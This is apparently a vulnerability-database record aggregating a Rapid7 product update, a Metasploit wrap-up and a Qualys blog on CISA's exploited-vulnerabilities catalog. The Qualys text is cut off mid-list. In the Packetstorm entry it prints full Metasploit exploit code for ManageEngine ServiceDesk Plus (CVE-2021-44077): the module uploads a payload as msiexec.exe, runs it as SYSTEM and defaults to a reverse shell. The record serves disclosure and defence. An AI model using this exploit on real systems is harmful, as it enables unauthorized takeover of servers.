allow customers to visualize the impact of a specific vulnerability or vulnerabilities to their environment.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/Screen-Shot-2022-02-15-at-3.46.02-PM.png)\n\nWe have a TON of additional Log4j resources here for you to check out:\n\n * A [blog ](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>)from our product manager Greg Wiseman that gives some great context on using InsightVM to detect Log4j\n * A [customer resource hub](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) on how various Rapid7 products help you defend against Log4j\n * A [general public resource hub](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) on background info about this extraordinary new vulnerability\n\n## [InsightVM & Nexpose] Additional vulnerability checks and content (non-Log4Shell)\n\nBelieve it or not, the world has seen other vulns beyond Log4j. As a team, we added nearly 4,000 vulnerability checks to InsightVM and Nexpose in Q4 and more than a few that warrant mentioning here.\n\n * Zoho's ManageEngine portfolio was affected by critical unauthenticated remote code execution vulnerabilities in [ServiceDesk Plus](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-servicedesk-plus-cve-2021-44077/>) and [Desktop Central](<https://www.rapid7.com/db/vulnerabilities/http-manageengine-dc-cve-2021-44515/>)\n * We also saw [opportunistic exploitation](<https://www.rapid7.com/blog/post/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/>) of [CVE-2021-42237](<https://www.rapid7.com/db/vulnerabilities/sitecore-experience-platform-cve-2021-42237/>), an insecure deserialization vulnerability in the SiteCore Experience Platform\n * The open-source CI/CD solution GoCD was hit by [CVE-2021-43287](<https://www.rapid7.com/db/vulnerabilities/http-gocd-cve-2021-43287/>), allowing unauthenticated attackers to leak configuration information, including build secrets and encryption keys, with a single HTTP request\n\nIf you want to learn more about these and many other threats that materialized during Q4, check out our [Emergent Threat Response](<https://www.rapid7.com/blog/tag/emergent-threat-response/>) blogs (you should check those out regularly, because we are constantly and consistently writing about new threats in near real-time).\n\n## [InsightVM & Nexpose] Introducing Scan Assistant\n\nCredential management for Scan Engine can be a huge burden on vulnerability management teams, especially when you are managing tens of thousands of devices. That's why we created Scan Assistant to help ease that burden.\n\nScan Assistant is a lightweight service that can be installed on each targeted scan. It allows you to scan targets without the need for credentials. When the Scan Engine scans a target with the Scan Assistant attached, it will automatically collect the information it needs to access the target without the need for additional scan credentials. In addition to enhanced security, Scan Assistant improves scan performance for vulnerability and policy scans, has a fully on-premise footprint, works with both InsightVM and Nexpose, and is completely idle until engaged by a scan. Scan Assistant has now GA'ed for Windows environment. We'll have coverage for other OSes to follow in the future.\n\nAnd, as usual, you can learn so much more [here](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/Untitled--38-.png)\n\n## [InsightVM & Nexpose] NEW - Scan diagnostic checks for Credential Status Reporting\n\nWhile we're on the subject of credentials during scans, every so often the scan engine can return a partial or total credential failure that might leave you scratching your head. With this new feature, InsightVM and Nexpose offer scan diagnostic checks that allow you to have more granular visibility into credential success (or lack thereof). This will allow you to better troubleshoot authenticated scans that return results you did not expect.\n\nResults are written as vulnerability checks, giving you the ability to use aspects of the platform's functionality that you are already familiar with to assess where things went wrong.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/pasted-image-0--31-.png)\n\n## [InsightVM] Container Image Scanner integration, additional container software library package checks, improved container scan results integration, and emailed reports\n\nWe are always looking for ways to make your life easier, and these three new improvements to the InsightVM platform are designed to do just that. First, we enhanced the Container Image Scanner to record and post results to InsightVM rather than just to the developer's local machine where the container lives. This allows the organization to better monitor the security of containers under development. Take a look for yourself \u2014 it's in the Builds tab of the Contain Security Section.\n\nWe've also launched a fingerprinter for .Net NuGet and Ruby Gem Packages. This allows us to check for vulnerabilities in these software packages leveraging the Snyk integration. This brings our support for Snyk security content to include Java Maven, Node NPM (Javascript), Python PIP, and now .Net NuGet Ruby Gem packages.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/dotnetvuln.png)\n\nFinally, we're making it easier to share findings across your organization by allowing reports to be sent via email. The entire message includes a password-protected and encrypted pdf and recipients receive a password in a separate email to ensure the info remains secure.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/Screen-Shot-2022-02-15-at-4.00.05-PM.png)\n\nQ4 was a trying time for everyone in the security sphere, and we know that our work on that front is far from done. We hope that some or all of these new InsightVM and Nexpose features make Q1 2022 and beyond a little easier, less stressful, and ultimately more secure. Stay strong!\n\n_**Additional reading:**_\n\n * _[Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](<https://www.rapid7.com/blog/post/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[Distribute Reports to Email Addresses in InsightVM](<https://www.rapid7.com/blog/post/2021/11/17/distribute-reports-to-email-addresses-in-insightvm/>)_\n * _[InsightVM Scan Diagnostics: Troubleshooting Credential Issues for Authenticated Scanning](<https://www.rapid7.com/blog/post/2021/11/03/insightvm-scan-diagnostics-troubleshooting-credential-issues-for-authenticated-scanning/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T14:20:00", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q4 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42237", "CVE-2021-43287", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T14:20:00", "id": "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "href": "https://blog.rapid7.com/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-07T17:52:07", "description": "## Dump Windows secrets from Active Directory\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2022/01/metasploit-ascii-1-2.png)\n\nThis week, our very own [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) added an important [update](<https://github.com/rapid7/metasploit-framework/pull/15924>) to the existing Windows Secret Dump module. It is now able to dump secrets from Active Directory, which will be very useful for Metasploit users. This new feature uses the Directory Replication Service through RPC to retrieve data such as SIDs, password history, Domain user NTLM hashes and Kerberos keys, etc. This replicates the behavior of the famous `impacket` [`secretsdump.py`](<https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py>), with the benefit of being fully integrated with Metasploit Framework. For example, it is possible to [pivot](<https://www.offensive-security.com/metasploit-unleashed/pivoting/>) on a compromised host and run the Windows Secret Dump module against an internal Domain Controller directly from `msfconsole`. Furthermore, the secrets are stored in the internal database, which lets other modules access this information easily.\n\nThis update also brings another big [improvement](<https://github.com/rapid7/ruby_smb/pull/179>) to the `ruby_smb` library. This adds a new DCERPC client and many ready-to-use RPC queries from [Directory Replication Service (DRS) Remote Protocol](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47>), [Security Account Manager (SAM) Remote Protocol](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380>) and [Workstation Service Remote Protocol](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380>). These will greatly simplify the process of writing modules that use DCERPC against Windows systems.\n\n## Authenticated Catch Themes Demo Import Remote Code Execution\n\nThank you to Ron Jost, Thinkland Security Team, and [h00die](<https://github.com/h00die>) for their community contribution of a Remote Code Execution exploit module against versions 1.8 and earlier of the Catch Themes Demo Import Wordpress Plugin.\n\n## New module content (6)\n\n * [Grafana Plugin Path Traversal](<https://github.com/rapid7/metasploit-framework/pull/15954>) by h00die and jordyv, which exploits [CVE-2021-43798](<https://attackerkb.com/topics/CVE-2021-43798?referrer=blog>) \\- This aAdds a module to exploit Grafana file read vulnerability CVE-2021-43798.\n * [Native LDAP Server (Example)](<https://github.com/rapid7/metasploit-framework/pull/15961>) by RageLtMan and Spencer McIntyre - This adds the initial implementation of an LDAP server implemented in Rex and updates the existing log4shell scanner module to use it as well as provides a new example module.\n * [Wordpress Plugin Catch Themes Demo Import RCE](<https://github.com/rapid7/metasploit-framework/pull/15988>) by Ron Jost, Thinkland Security Team, and h00die, which exploits [CVE-2021-39352](<https://attackerkb.com/topics/s7edbWB4Vg/cve-2021-39352?referrer=blog>) \\- This adds an exploit for the Catch Themes Demo Import Wordpress plugin for versions below `1.8`. The functionality for importing a theme does not properly sanitize file formats, allowing an authenticated user to upload a php payload. Requesting the uploaded file achieves code execution as the user running the web server.\n * [Wordpress Popular Posts Authenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/15948>) by Jerome Bruandet, Simone Cristofaro, and h00die, which exploits [CVE-2021-42362](<https://attackerkb.com/topics/FzFxJJq242/cve-2021-42362?referrer=blog>) \\- This PR adds a new exploit for wp_popular_posts <=5.3.2.\n * [ManageEngine ServiceDesk Plus CVE-2021-44077](<https://github.com/rapid7/metasploit-framework/pull/15950>) by wvu and Y4er, which exploits [CVE-2021-44077](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077?referrer=blog>)\n * [Dell DBUtilDrv2.sys Memory Protection Modifier](<https://github.com/rapid7/metasploit-framework/pull/15955>) by Jacob Baines, Kasif Dekel, Red Cursor, and SentinelLabs - This module leverages a write-what-where condition in DBUtilDrv2.sys version 2.5 or 2.7 to disable or enable LSA protect on a given PID (assuming the system is configured for LSA Protection). The drivers must be provided by the user.\n\n## Enhancements and features\n\n * [#15831](<https://github.com/rapid7/metasploit-framework/pull/15831>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Established SSH connections can now leverage the pivoting capabilities of the `SshCommandShellBind` session type.\n * [#15882](<https://github.com/rapid7/metasploit-framework/pull/15882>) from [smashery](<https://github.com/smashery>) \\- An update has been made which will prevent exploits from running a payload if the exploit drops files onto the target, but the payload doesn't have the capability to clean those dropped files up from the target. Users can still override this setting by specifying `set AllowNoCleanup true` if they wish to bypass this protection.\n * [#15924](<https://github.com/rapid7/metasploit-framework/pull/15924>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This adds the NTDS technique to the Windows Secrets Dump module, enabling it to be used against Domain Controllers. It also pulls in RubySMB changes that include many DCERPC related improvements and features.\n * [#15986](<https://github.com/rapid7/metasploit-framework/pull/15986>) from [bcoles](<https://github.com/bcoles>) \\- Module notes added to `bash_profile_persistence` now describe impacts of utilizing the module in a target environment.\n\n## Bugs fixed\n\n * [#15982](<https://github.com/rapid7/metasploit-framework/pull/15982>) from [3V3RYONE](<https://github.com/3V3RYONE>) \\- This fixes a bug where modules using the SMB client would crash when the `SMBUser` datastore option had been explicitly unset.\n * [#15984](<https://github.com/rapid7/metasploit-framework/pull/15984>) from [h00die](<https://github.com/h00die>) \\- This PR fixes a bug in the snmp library which caused it to ignore version 1, despite specifically set options.\n * [#16003](<https://github.com/rapid7/metasploit-framework/pull/16003>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes an issue with GitHub actions where the Ruby 3.1.0 version string is not yet being parsed correctly leading to automation failures.\n * [#16015](<https://github.com/rapid7/metasploit-framework/pull/16015>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a regression in tab completion for the RHOSTS datastore option.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.20...6.1.23](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-12-16T12%3A07%3A37-06%3A00..2022-01-06T10%3A44%3A33-06%3A00%22>)\n * [Full diff 6.1.20...6.1.23](<https://github.com/rapid7/metasploit-framework/compare/6.1.20...6.1.23>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-07T17:28:25", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39352", "CVE-2021-42362", "CVE-2021-43798", "CVE-2021-44077"], "modified": "2022-01-07T17:28:25", "id": "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5", "href": "https://blog.rapid7.com/2022/01/07/metasploit-wrap-up-144/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-12-28T17:29:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-28T00:00:00", "type": "packetstorm", "title": "ManageEngine ServiceDesk Plus Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-28T00:00:00", "id": "PACKETSTORM:165400", "href": "https://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077', \n'Description' => %q{ \nThis module exploits CVE-2021-44077, an unauthenticated remote code \nexecution vulnerability in ManageEngine ServiceDesk Plus, to upload an \nEXE (msiexec.exe) and execute it as the SYSTEM account. \n \nNote that build 11305 is vulnerable to the authentication bypass but \nnot the file upload. The module will check for an exploitable build. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'wvu', # Analysis and exploit \n'Y4er' # Additional confirmation \n], \n'References' => [ \n['CVE', '2021-44077'], \n['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'], \n['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'], \n['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'], \n['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'], \n['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'], \n['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup \n], \n'DisclosureDate' => '2021-09-16', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8080, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians') \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to check.') \nend \n \n# NOTE: /RestAPI/ImportTechnicians was removed after build 11303 \nunless res.code == 200 && res.get_html_document.at('//form[@name=\"ImportTechnicians\"]') \nreturn CheckCode::Safe('/RestAPI/ImportTechnicians is not present.') \nend \n \nCheckCode::Appears('/RestAPI/ImportTechnicians is present.') \nend \n \ndef exploit \nupload_msiexec \nexecute_msiexec \nend \n \ndef upload_msiexec \nprint_status('Uploading msiexec.exe') \n \nform = Rex::MIME::Message.new \nform.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name=\"step\"') \nform.add_part(generate_payload_exe, 'application/octet-stream', 'binary', \n'form-data; name=\"theFile\"; filename=\"msiexec.exe\"') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title') \nfail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe') \nend \n \nprint_good('Successfully uploaded msiexec.exe') \nend \n \ndef execute_msiexec \nprint_status('Executing msiexec.exe') \n \n# This endpoint \"won't\" return \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'), \n'vars_post' => { \n'execute' => 's247AgentInstallationProcess' \n} \n}, 0) \nend \n \n# XXX: FileDropper dies a miserable death if the file is in use \ndef on_new_session(_session) \nsuper \n \n# Working directory is C:\\Program Files\\ManageEngine\\ServiceDesk\\site24x7 \nprint_warning(\"Yo, don't forget to clean up ..\\\\bin\\\\msiexec.exe\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165400/manageengine_servicedesk_plus_cve_2021_44077.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE